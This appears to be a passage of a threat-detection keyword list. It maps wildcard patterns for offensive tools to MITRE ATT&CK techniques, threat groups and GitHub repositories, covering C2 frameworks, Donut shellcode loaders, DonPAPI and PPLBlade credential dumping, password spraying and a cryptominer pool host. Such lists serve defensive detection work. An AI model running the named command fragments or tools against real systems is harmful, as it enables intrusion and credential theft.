-*DoHC2*BeaconConnector*,offensive_tool_keyword,DoHC2,DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). 
This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike,T1090.004 - T1021.002 - T1071.001,TA0011 - TA0008,N/A,N/A,C2,https://github.com/SpiderLabs/DoHC2,1,1,N/A,10,10,432,99,2020-08-07T12:48:13Z,2018-10-23T19:40:23Z -*DoHC2.exe*,offensive_tool_keyword,DoHC2,DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike,T1090.004 - T1021.002 - T1071.001,TA0011 - TA0008,N/A,N/A,C2,https://github.com/SpiderLabs/DoHC2,1,1,N/A,10,10,432,99,2020-08-07T12:48:13Z,2018-10-23T19:40:23Z -*DoHC2.py*,offensive_tool_keyword,DoHC2,DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike,T1090.004 - T1021.002 - T1071.001,TA0011 - TA0008,N/A,N/A,C2,https://github.com/SpiderLabs/DoHC2,1,1,N/A,10,10,432,99,2020-08-07T12:48:13Z,2018-10-23T19:40:23Z -*DoHC2Runner.*,offensive_tool_keyword,DoHC2,DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike,T1090.004 - T1021.002 - T1071.001,TA0011 - TA0008,N/A,N/A,C2,https://github.com/SpiderLabs/DoHC2,1,1,N/A,10,10,432,99,2020-08-07T12:48:13Z,2018-10-23T19:40:23Z -*DoHC2Runner.exe*,offensive_tool_keyword,DoHC2,DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). 
This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike,T1090.004 - T1021.002 - T1071.001,TA0011 - TA0008,N/A,N/A,C2,https://github.com/SpiderLabs/DoHC2,1,1,N/A,10,10,432,99,2020-08-07T12:48:13Z,2018-10-23T19:40:23Z -*DoHC2Runner.pdb*,offensive_tool_keyword,DoHC2,DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike,T1090.004 - T1021.002 - T1071.001,TA0011 - TA0008,N/A,N/A,C2,https://github.com/SpiderLabs/DoHC2,1,1,N/A,10,10,432,99,2020-08-07T12:48:13Z,2018-10-23T19:40:23Z -*DoHChannel.cs*,offensive_tool_keyword,DoHC2,DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike,T1090.004 - T1021.002 - T1071.001,TA0011 - TA0008,N/A,N/A,C2,https://github.com/SpiderLabs/DoHC2,1,0,N/A,10,10,432,99,2020-08-07T12:48:13Z,2018-10-23T19:40:23Z -*-Domain * -AllowDelegation *,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*-Domain * -SPN *,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Domain/CommandCollection*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,1,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -*-domain_admins.txt*,offensive_tool_keyword,SilentHound,Quietly enumerate an Active Directory Domain via LDAP parsing users + admins + groups...,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/layer8secure/SilentHound,1,0,N/A,N/A,5,430,44,2023-01-23T20:41:55Z,2022-07-01T13:49:24Z -*domain_analyzer.py*,offensive_tool_keyword,domain_analyzer,Analyze the security of any domain by finding all the information possible,T1560 - T1590 - T1200 - T1213 - T1057,TA0002 - TA0009,N/A,N/A,Information Gathering,https://github.com/eldraco/domain_analyzer,1,1,N/A,6,10,1831,259,2022-12-29T10:57:33Z,2017-08-08T18:52:34Z -*domain_analyzer-master*,offensive_tool_keyword,domain_analyzer,Analyze the security of any domain by finding all the information possible,T1560 - T1590 - T1200 - T1213 - T1057,TA0002 - TA0009,N/A,N/A,Information Gathering,https://github.com/eldraco/domain_analyzer,1,1,N/A,6,10,1831,259,2022-12-29T10:57:33Z,2017-08-08T18:52:34Z -*domain_hunter-v*.jar,offensive_tool_keyword,burpsuite,Collection of burpsuite plugins,T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574,TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,Network Exploitation tools,https://github.com/Mr-xn/BurpSuite-collections,1,1,N/A,N/A,10,2757,606,2023-08-04T13:50:07Z,2020-01-25T02:07:37Z -*domainDumpConfig*,offensive_tool_keyword,ldapdomaindump,Active Directory information dumper via LDAP,T1087 - T1005 - T1016,TA0007,N/A,N/A,Credential Access,https://github.com/dirkjanm/ldapdomaindump,1,1,N/A,N/A,10,970,176,2023-09-06T05:50:30Z,2016-05-24T18:46:56Z -*DomainEnumerator*,offensive_tool_keyword,bloodhound,A Python 
based ingestor for BloodHound,T1057 - T1059 - T1053,TA0003 - TA0008 - TA0009,N/A,N/A,Reconnaissance,https://github.com/fox-it/BloodHound.py,1,1,N/A,10,10,1538,268,2023-09-27T07:56:12Z,2018-02-26T14:44:20Z -*domainhunter*,offensive_tool_keyword,domainhunter,Domain name selection is an important aspect of preparation for penetration tests and especially Red Team engagements. Commonly. domains that were used previously for benign purposes and were properly categorized can be purchased for only a few dollars. Such domains can allow a team to bypass reputation based web filters and network egress restrictions for phishing and C2 related tasks.This Python based tool was written to quickly query the Expireddomains.net search engine for expired/available domains with a previous history of use. It then optionally queries for domain reputation against services like Symantec Site Review (BlueCoat). IBM X-Force. and Cisco Talos. The primary tool output is a timestamped HTML table style report.,T1568 - T1596 - T1569 - T1593,N/A,N/A,N/A,Information Gathering,https://github.com/threatexpress/domainhunter,1,0,N/A,N/A,10,1380,291,2022-10-26T03:15:13Z,2017-03-01T11:16:26Z -*domainhunter.py*,offensive_tool_keyword,domainhunter,Checks expired domains for categorization/reputation and Archive.org history to determine good candidates for phishing and C2 domain names ,T1583.002 - T1568.002,TA0011 - TA0009,N/A,N/A,Phishing,https://github.com/threatexpress/domainhunter,1,1,N/A,N/A,10,1380,291,2022-10-26T03:15:13Z,2017-03-01T11:16:26Z -*Domaininfo/Domaininfo.py*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z 
-*Domainpassspray*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*DomainPasswordSpray*,offensive_tool_keyword,DomainPasswordSpray,DomainPasswordSpray is a tool written in PowerShell to perform a password spray attack against users of a domain. By default it will automatically generate the userlist from the domain. BE VERY CAREFUL NOT TO LOCKOUT ACCOUNTS!,t1110 - T1114 - T1555,TA0006 - TA0003 - TA0040,N/A,N/A,Credential Access,https://github.com/dafthack/DomainPasswordSpray,1,1,N/A,N/A,10,1498,354,2023-09-22T22:13:14Z,2016-10-04T23:37:37Z -*DomainRecon*ridbrute*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*DomainRecon/ADCS*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*DomainRecon/BloodHound*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation 
Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*DomainRecon/SilentHound*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*DomainRecon\ADCSServer.txt*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,0,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*DomainRecon\DC-IPs.txt*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,0,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*DomainRecon\ExploitableSystems.txt*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,0,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*DomainRecon\OxidBindings.txt*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,0,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*DomainRecon\Windows_Servers.txt*,offensive_tool_keyword,WinPwn,Automation for internal 
Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,0,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*DomainTrustDiscovery_PowerView.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*domcachedump.py*,offensive_tool_keyword,donpapi,Dumping DPAPI credentials remotely,T1003.006 - T1021.001,TA0006 - TA0008,N/A,N/A,Credential Access,https://github.com/login-securite/DonPAPI,1,1,N/A,N/A,8,731,94,2023-10-03T05:27:06Z,2021-09-27T09:12:51Z -*dome.py *,offensive_tool_keyword,DOME,DOME - A subdomain enumeration tool,T1583 - T1595 - T1190,TA0011 - TA0009,N/A,N/A,Network Exploitation tools,https://github.com/v4d1/Dome,1,0,N/A,N/A,4,375,50,2022-03-10T12:08:17Z,2022-02-20T15:09:40Z -*DominicBreuker*,offensive_tool_keyword,Github Username,Github username hosting exploitation tools,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/DominicBreuker,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*DominicBreuker/pspy*,offensive_tool_keyword,pspy,Monitor linux processes without root permissions,T1057 - T1514 - T1082,TA0007 - TA0009 - TA0003,N/A,N/A,Discovery,https://github.com/DominicBreuker/pspy,1,1,N/A,6,10,4029,449,2023-01-17T21:09:22Z,2018-02-08T21:41:37Z -*donapapi -pvk *,offensive_tool_keyword,donpapi,Dumping DPAPI credentials remotely,T1003.006 - T1021.001,TA0006 - TA0008,N/A,N/A,Credential 
Access,https://github.com/login-securite/DonPAPI,1,0,N/A,N/A,8,731,94,2023-10-03T05:27:06Z,2021-09-27T09:12:51Z -*donate.v2.xmrig.com:3333*,greyware_tool_keyword,xmrig,CPU/GPU cryptominer often used by attackers on compromised machines,T1496 - T1057,TA0004 - TA0007,N/A,N/A,Cryptomining,https://github.com/xmrig/xmrig/,1,0,N/A,9,10,7768,3471,2023-09-29T12:15:29Z,2017-04-15T05:57:53Z -*DoNotUseThisPassword123!*,offensive_tool_keyword,hashview,A web front-end for password cracking and analytics,T1110 - T1201,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/hashview/hashview,1,0,N/A,10,4,319,38,2023-09-22T21:30:50Z,2020-11-23T19:21:06Z -"*DonPAPI ""$DOMAIN""/*",offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*donpapi -credz *,offensive_tool_keyword,donpapi,Dumping DPAPI credentials remotely,T1003.006 - T1021.001,TA0006 - TA0008,N/A,N/A,Credential Access,https://github.com/login-securite/DonPAPI,1,0,N/A,N/A,8,731,94,2023-10-03T05:27:06Z,2021-09-27T09:12:51Z -*DonPAPI.py *,offensive_tool_keyword,donpapi,Dumping DPAPI credentials remotely,T1003.006 - T1021.001,TA0006 - TA0008,N/A,N/A,Credential Access,https://github.com/login-securite/DonPAPI,1,1,N/A,N/A,8,731,94,2023-10-03T05:27:06Z,2021-09-27T09:12:51Z -*donpapi_dump*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*donpapi-master.zip*,offensive_tool_keyword,donpapi,Dumping DPAPI 
credentials remotely,T1003.006 - T1021.001,TA0006 - TA0008,N/A,N/A,Credential Access,https://github.com/login-securite/DonPAPI,1,1,N/A,N/A,8,731,94,2023-10-03T05:27:06Z,2021-09-27T09:12:51Z -*donut -f *.dll -c * -m RunProcess*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,0,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*donut -f c2.dll*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,0,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*donut* \DemoCreateProcess.dll *,offensive_tool_keyword,donut,Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself,T1055 - T1027 - T1202,TA0002 - TA0003 ,N/A,Indrik Spider,Exploitation tools,https://github.com/TheWover/donut,1,0,N/A,N/A,10,2877,557,2023-04-26T21:11:01Z,2019-03-27T23:24:44Z -*donut.exe *.exe*,offensive_tool_keyword,donut,Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself,T1055 - T1027 - T1202,TA0002 - TA0003 ,N/A,Indrik Spider,Exploitation tools,https://github.com/TheWover/donut,1,0,N/A,N/A,10,2877,557,2023-04-26T21:11:01Z,2019-03-27T23:24:44Z -*DONUT_BYPASS_CONTINUE*,offensive_tool_keyword,donut,Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. 
DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself,T1055 - T1027 - T1202,TA0002 - TA0003 ,N/A,Indrik Spider,Exploitation tools,https://github.com/TheWover/donut,1,1,N/A,N/A,10,2877,557,2023-04-26T21:11:01Z,2019-03-27T23:24:44Z -*donut-loader -*,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,0,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*Donut-Loader -process_id*,offensive_tool_keyword,evil-winrm,This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.,T1021.006 - T1059.001 - T1059.003 - T1047,TA0002 - TA0008,N/A,N/A,Exploitation tools,https://github.com/Hackplayers/evil-winrm,1,0,N/A,10,10,3760,566,2023-06-09T07:42:42Z,2019-05-28T10:53:00Z -*DonutLoader(*,offensive_tool_keyword,donut,Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. 
DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself,T1055 - T1027 - T1202,TA0002 - TA0003 ,N/A,Indrik Spider,Exploitation tools,https://github.com/TheWover/donut,1,0,N/A,N/A,10,2877,557,2023-04-26T21:11:01Z,2019-03-27T23:24:44Z -*DonutLoader.cs*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*donut-maker.py -*,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,0,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*donut-maker.py -i *.exe*,offensive_tool_keyword,evil-winrm,This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. 
It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.,T1021.006 - T1059.001 - T1059.003 - T1047,TA0002 - TA0008,N/A,N/A,Exploitation tools,https://github.com/Hackplayers/evil-winrm,1,0,N/A,10,10,3760,566,2023-06-09T07:42:42Z,2019-05-28T10:53:00Z -*donut-payload.*,offensive_tool_keyword,donut,Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself,T1055 - T1027 - T1202,TA0002 - TA0003 ,N/A,Indrik Spider,Exploitation tools,https://github.com/TheWover/donut,1,1,N/A,N/A,10,2877,557,2023-04-26T21:11:01Z,2019-03-27T23:24:44Z -*donut-shellcode*,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,1,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*donut-shellcode*,offensive_tool_keyword,donut,Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. 
A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself,T1055 - T1027 - T1202,TA0002 - TA0003 ,N/A,Indrik Spider,Exploitation tools,https://github.com/TheWover/donut,1,1,N/A,N/A,10,2877,557,2023-04-26T21:11:01Z,2019-03-27T23:24:44Z -*donut-shellcode*,offensive_tool_keyword,Ninja,Open source C2 server created for stealth red team operations,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/ahmedkhlief/Ninja,1,1,N/A,10,10,720,166,2022-09-26T16:07:43Z,2020-03-04T14:17:22Z -*dos-over-tor*,offensive_tool_keyword,dos-over-tor,Proof of concept denial of service over TOR stress test tool. Is multi-threaded and supports multiple attack vectors.,T1583 - T1090,TA0040 - TA0043,N/A,N/A,DDOS,https://github.com/skizap/dos-over-tor,1,0,N/A,N/A,1,10,11,2018-07-21T01:44:41Z,2018-07-26T07:05:37Z -*dothatlsassthing*,offensive_tool_keyword,PPLBlade,Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.,T1003.001 - T1027.004 - T1560.001 - T1039 - T1570,TA0006 - TA0005 - TA0010 - TA0003,N/A,N/A,Credential Access - Data Exfiltration,https://github.com/tastypepperoni/PPLBlade,1,0,N/A,10,4,324,36,2023-08-30T07:59:51Z,2023-08-29T19:36:04Z -*dotnet ./Server.dll*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,0,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z -*dotnet inline-execute *,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - 
TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,0,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*dotnet Inveigh.dll*,offensive_tool_keyword,Inveigh,.NET IPv4/IPv6 machine-in-the-middle tool for penetration testers,T1550.002 - T1059.001 - T1071.001,TA0002,N/A,N/A,Sniffing & Spoofing,https://github.com/Kevin-Robertson/Inveigh,1,0,N/A,10,10,2212,441,2023-06-13T01:36:42Z,2015-04-02T18:04:41Z -*dotnet ParseMalleable/ParseMalleable.dll*,offensive_tool_keyword,AzureC2Relay,AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.,T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001,TA0042 - TA0005 - TA0011,N/A,N/A,C2,https://github.com/Flangvik/AzureC2Relay,1,0,N/A,10,10,198,47,2021-02-15T18:06:38Z,2021-02-14T00:03:52Z -*dotnet_serve_payload*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and 